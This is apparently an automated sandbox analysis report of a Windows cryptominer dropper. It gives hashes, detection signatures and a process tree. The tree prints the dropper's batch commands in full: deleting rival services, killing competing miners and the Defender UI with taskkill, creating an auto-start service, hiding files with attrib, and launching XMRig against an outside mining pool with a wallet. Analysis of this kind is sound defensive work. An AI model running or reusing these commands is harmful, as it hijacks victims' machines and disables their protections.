Analysis
-
max time kernel
148s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
20-05-2024 10:26
Static task
static1
Behavioral task
behavioral1
Sample
5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
Resource
win7-20240220-en
General
-
Target
5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
-
Size
1.3MB
-
MD5
5e960ba61a82c5340650e2ce975bb4c9
-
SHA1
300aced1503b54d91e5508f0a210330e91b71b8a
-
SHA256
1faff4cf4bfe0d40af1555dc2ca749c5a382197b51b327ad89c4734d6ba75ee3
-
SHA512
9143b2172a13f1d36380bd7dc9875d21c994b9aaed71b3d3a094de23ff58b3ec64adb166b727b1a41574447cd67e30ec8992278fa78d0f3f42928e576e5d1fa1
-
SSDEEP
24576:jJlh9bDrRloua2E61y6ssIpCLpNwDfzhC8avIZej5O:jJp/FLrWpe8xChgZej5O
Malware Config
Signatures
-
XMRig Miner payload 14 IoCs
resource yara_rule behavioral1/files/0x000700000001418c-32.dat xmrig behavioral1/memory/444-35-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral1/memory/444-36-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral1/memory/444-38-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral1/memory/444-39-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral1/memory/444-40-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral1/memory/444-41-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral1/memory/444-42-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral1/memory/444-43-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral1/memory/444-44-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral1/memory/444-45-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral1/memory/444-46-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral1/memory/444-47-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig behavioral1/memory/444-48-0x0000000000400000-0x00000000004B5000-memory.dmp xmrig -
Creates new service(s) 2 TTPs
-
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 584 attrib.exe 564 attrib.exe 2804 attrib.exe 1404 attrib.exe -
Deletes itself 1 IoCs
pid Process 2484 cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 2164 mscorsvw.exe 444 svchost.exe -
Loads dropped DLL 1 IoCs
pid Process 2164 mscorsvw.exe -
resource yara_rule behavioral1/files/0x002a000000013a88-22.dat vmprotect behavioral1/memory/2164-24-0x0000000000400000-0x000000000055E000-memory.dmp vmprotect behavioral1/memory/2164-25-0x0000000000400000-0x000000000055E000-memory.dmp vmprotect behavioral1/memory/2164-37-0x0000000000400000-0x000000000055E000-memory.dmp vmprotect -
Drops file in Windows directory 16 IoCs
description ioc Process File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.exe attrib.exe File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.log attrib.exe File created C:\Windows\debug\wkde\mscorsvw.ini 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File created C:\Windows\debug\wkde\svchost.exe 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File opened for modification C:\Windows\debug\wkde\svchost.exe 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File created C:\Windows\debug\wkde\wk.bat 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File opened for modification C:\Windows\debug\wkde\wk.bat 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.ini attrib.exe File created C:\Windows\debug\__tmp_rar_sfx_access_check_259395217 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File created C:\Windows\debug\wkde\mscorsvw.exe 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File created C:\WINDOWS\Debug\wkde\mscorsvw.exe 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File opened for modification C:\Windows\debug\wkde\mscorsvw.ini 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.log mscorsvw.exe File opened for modification C:\Windows\debug\wkde 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File opened for modification C:\Windows\debug\wkde\mscorsvw.exe 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe File opened for modification C:\WINDOWS\Debug\wkde\svchost.exe attrib.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2416 sc.exe 2700 sc.exe 2192 sc.exe 2620 sc.exe 2532 sc.exe 2508 sc.exe 2388 sc.exe 2784 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 15 IoCs
pid Process 2688 taskkill.exe 2040 taskkill.exe 856 taskkill.exe 848 taskkill.exe 2864 taskkill.exe 356 taskkill.exe 1128 taskkill.exe 1792 taskkill.exe 1020 taskkill.exe 2624 taskkill.exe 2444 taskkill.exe 2440 taskkill.exe 1520 taskkill.exe 1452 taskkill.exe 1964 taskkill.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 804 PING.EXE 2760 PING.EXE -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 2688 taskkill.exe Token: SeDebugPrivilege 2624 taskkill.exe Token: SeDebugPrivilege 2444 taskkill.exe Token: SeDebugPrivilege 2864 taskkill.exe Token: SeDebugPrivilege 2040 taskkill.exe Token: SeDebugPrivilege 856 taskkill.exe Token: SeDebugPrivilege 2440 taskkill.exe Token: SeDebugPrivilege 356 taskkill.exe Token: SeDebugPrivilege 1792 taskkill.exe Token: SeDebugPrivilege 1520 taskkill.exe Token: SeDebugPrivilege 1452 taskkill.exe Token: SeDebugPrivilege 1020 taskkill.exe Token: SeDebugPrivilege 848 taskkill.exe Token: SeDebugPrivilege 1128 taskkill.exe Token: SeDebugPrivilege 1964 taskkill.exe Token: SeLockMemoryPrivilege 444 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2184 wrote to memory of 2484 2184 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe 28 PID 2184 wrote to memory of 2484 2184 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe 28 PID 2184 wrote to memory of 2484 2184 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe 28 PID 2184 wrote to memory of 2484 2184 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe 28 PID 2484 wrote to memory of 2620 2484 cmd.exe 30 PID 2484 wrote to memory of 2620 2484 cmd.exe 30 PID 2484 wrote to memory of 2620 2484 cmd.exe 30 PID 2484 wrote to memory of 2620 2484 cmd.exe 30 PID 2484 wrote to memory of 2532 2484 cmd.exe 31 PID 2484 wrote to memory of 2532 2484 cmd.exe 31 PID 2484 wrote to memory of 2532 2484 cmd.exe 31 PID 2484 wrote to memory of 2532 2484 cmd.exe 31 PID 2484 wrote to memory of 2508 2484 cmd.exe 32 PID 2484 wrote to memory of 2508 2484 cmd.exe 32 PID 2484 wrote to memory of 2508 2484 cmd.exe 32 PID 2484 wrote to memory of 2508 2484 cmd.exe 32 PID 2484 wrote to memory of 2388 2484 cmd.exe 33 PID 2484 wrote to memory of 2388 2484 cmd.exe 33 PID 2484 wrote to memory of 2388 2484 cmd.exe 33 PID 2484 wrote to memory of 2388 2484 cmd.exe 33 PID 2484 wrote to memory of 2784 2484 cmd.exe 34 PID 2484 wrote to memory of 2784 2484 cmd.exe 34 PID 2484 wrote to memory of 2784 2484 cmd.exe 34 PID 2484 wrote to memory of 2784 2484 cmd.exe 34 PID 2484 wrote to memory of 2700 2484 cmd.exe 35 PID 2484 wrote to memory of 2700 2484 cmd.exe 35 PID 2484 wrote to memory of 2700 2484 cmd.exe 35 PID 2484 wrote to memory of 2700 2484 cmd.exe 35 PID 2484 wrote to memory of 2416 2484 cmd.exe 36 PID 2484 wrote to memory of 2416 2484 cmd.exe 36 PID 2484 wrote to memory of 2416 2484 cmd.exe 36 PID 2484 wrote to memory of 2416 2484 cmd.exe 36 PID 2484 wrote to memory of 2688 2484 cmd.exe 37 PID 2484 wrote to memory of 2688 2484 cmd.exe 37 PID 2484 wrote to memory of 2688 2484 cmd.exe 37 PID 2484 wrote to memory of 2688 2484 cmd.exe 37 PID 2484 wrote to memory of 2624 2484 cmd.exe 39 PID 2484 wrote to memory of 2624 2484 cmd.exe 39 PID 2484 wrote to memory of 2624 2484 cmd.exe 39 PID 2484 wrote to memory of 2624 2484 cmd.exe 39 PID 2484 wrote to memory of 2444 2484 cmd.exe 40 PID 2484 wrote to memory of 2444 2484 cmd.exe 40 PID 2484 wrote to memory of 2444 2484 cmd.exe 40 PID 2484 wrote to memory of 2444 2484 cmd.exe 40 PID 2484 wrote to memory of 2864 2484 cmd.exe 41 PID 2484 wrote to memory of 2864 2484 cmd.exe 41 PID 2484 wrote to memory of 2864 2484 cmd.exe 41 PID 2484 wrote to memory of 2864 2484 cmd.exe 41 PID 2484 wrote to memory of 2040 2484 cmd.exe 42 PID 2484 wrote to memory of 2040 2484 cmd.exe 42 PID 2484 wrote to memory of 2040 2484 cmd.exe 42 PID 2484 wrote to memory of 2040 2484 cmd.exe 42 PID 2484 wrote to memory of 856 2484 cmd.exe 43 PID 2484 wrote to memory of 856 2484 cmd.exe 43 PID 2484 wrote to memory of 856 2484 cmd.exe 43 PID 2484 wrote to memory of 856 2484 cmd.exe 43 PID 2484 wrote to memory of 2440 2484 cmd.exe 44 PID 2484 wrote to memory of 2440 2484 cmd.exe 44 PID 2484 wrote to memory of 2440 2484 cmd.exe 44 PID 2484 wrote to memory of 2440 2484 cmd.exe 44 PID 2484 wrote to memory of 356 2484 cmd.exe 45 PID 2484 wrote to memory of 356 2484 cmd.exe 45 PID 2484 wrote to memory of 356 2484 cmd.exe 45 PID 2484 wrote to memory of 356 2484 cmd.exe 45 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 564 attrib.exe 2804 attrib.exe 1404 attrib.exe 584 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\WINDOWS\Debug\wkde\wk.bat" "2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\SysWOW64\sc.exesc delete Systemss3⤵
- Launches sc.exe
PID:2620
-
-
C:\Windows\SysWOW64\sc.exesc delete WMIserver3⤵
- Launches sc.exe
PID:2532
-
-
C:\Windows\SysWOW64\sc.exesc delete WMIservers3⤵
- Launches sc.exe
PID:2508
-
-
C:\Windows\SysWOW64\sc.exesc delete WMI3⤵
- Launches sc.exe
PID:2388
-
-
C:\Windows\SysWOW64\sc.exesc delete Serv3⤵
- Launches sc.exe
PID:2784
-
-
C:\Windows\SysWOW64\sc.exesc delete system_update3⤵
- Launches sc.exe
PID:2700
-
-
C:\Windows\SysWOW64\sc.exesc delete system_updatea3⤵
- Launches sc.exe
PID:2416
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spoolsvs.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskhost.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im NsCpuapl.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im MSASCui.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nheqminer_zcash.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nssm.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im update.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im server.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:356
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sppscv.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskhost.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\SysWOW64\net.exenet stop wkde3⤵PID:1676
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wkde4⤵PID:352
-
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.13⤵
- Runs ping.exe
PID:804
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mscorsvw.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im WUDFHost.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im nheqminer.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im NsCpuCNMiner32.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im NsCpuCNMiner64.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2760
-
-
C:\Windows\SysWOW64\sc.exesc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto3⤵
- Launches sc.exe
PID:2192
-
-
C:\Windows\SysWOW64\net.exenet start wkde3⤵PID:2180
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start wkde4⤵PID:1596
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:584
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:564
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:2804
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:1404
-
-
-
C:\WINDOWS\Debug\wkde\mscorsvw.exeC:\WINDOWS\Debug\wkde\mscorsvw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:2164 -
C:\WINDOWS\Debug\wkde\svchost.exeC:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:444
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
397B
MD5d298cd48c88433017ef4e66af740830e
SHA1e0ef455dc4df16948d85c5a058d0980ce5020822
SHA256b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89
SHA5125927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe
-
Filesize
244B
MD5df296d0aa6eb740c57059aa9f47fd46c
SHA1de668e0436d036c2608b3a16fbfaaf3cbfd52a59
SHA2563d8e422765d4e10add74a69d85ea827b90dbc2c25d021185f1bf1fbe3363823a
SHA512db6ef5caf3a7c682a64fe18583e2f91dc9b5fe71a274eaf5e0112246cc04b6a44abe5af7cececf73a3411f4364357acc92400b70c6d3fdd0854b4732126a8fc5
-
Filesize
687KB
MD579a1ec8d32e8e3032b5f5126c11f2216
SHA186dc55fcdc358a5c6699c41582b66b75bedc4086
SHA256d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8
SHA512a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106
-
Filesize
684KB
MD5cbb4ca806e69a4880dd02e04e5bce18b
SHA11e838ddad7b04a1f2be935f6fe8e7cff3466c4d7
SHA2562cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b
SHA5126240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6
-
Filesize
884B
MD5816d97b2dca2af96209ef913291d59be
SHA1a3c480a7e333a1623e7cd8194d68468397c3f6d1
SHA256ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d
SHA51254bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088